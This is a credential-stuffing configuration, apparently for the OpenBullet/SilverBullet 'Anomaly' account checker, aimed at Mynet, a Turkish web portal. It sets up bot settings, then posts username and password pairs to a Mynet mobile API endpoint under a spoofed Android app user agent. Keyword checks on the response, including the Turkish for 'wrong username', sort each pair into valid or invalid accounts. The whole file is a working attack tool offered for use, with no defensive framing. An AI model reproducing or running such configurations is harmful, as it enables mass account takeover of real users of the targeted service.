[SETTINGS]
{
  "Name": "[CT] Mynet [APİ]",
  "SuggestedBots": 1,
  "MaxCPM": 0,
  "LastModified": "2022-06-24T15:08:11.1965062+03:00",
  "AdditionalInfo": "",
  "Author": "Astronot",
  "Version": "1.4.4 [Anomaly]",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "Contour": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "Crop": false,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION URLEncode "<USER>" -> VAR "US" 

REQUEST POST "https://uyeler.mynet.com/index/newregister/thirdparty/iphone" 
  CONTENT "u=<US>&p=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: mynet_android_4.56" 
  HEADER "Content-Type: application/x-www-form-urlencoded" 
  HEADER "Host: uyeler.mynet.com" 
  HEADER "Connection: Keep-Alive" 
  HEADER "Accept-Encoding: gzip" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "Hatalı kullanıcı adı" 
  KEYCHAIN Success OR 
    KEY "true" 

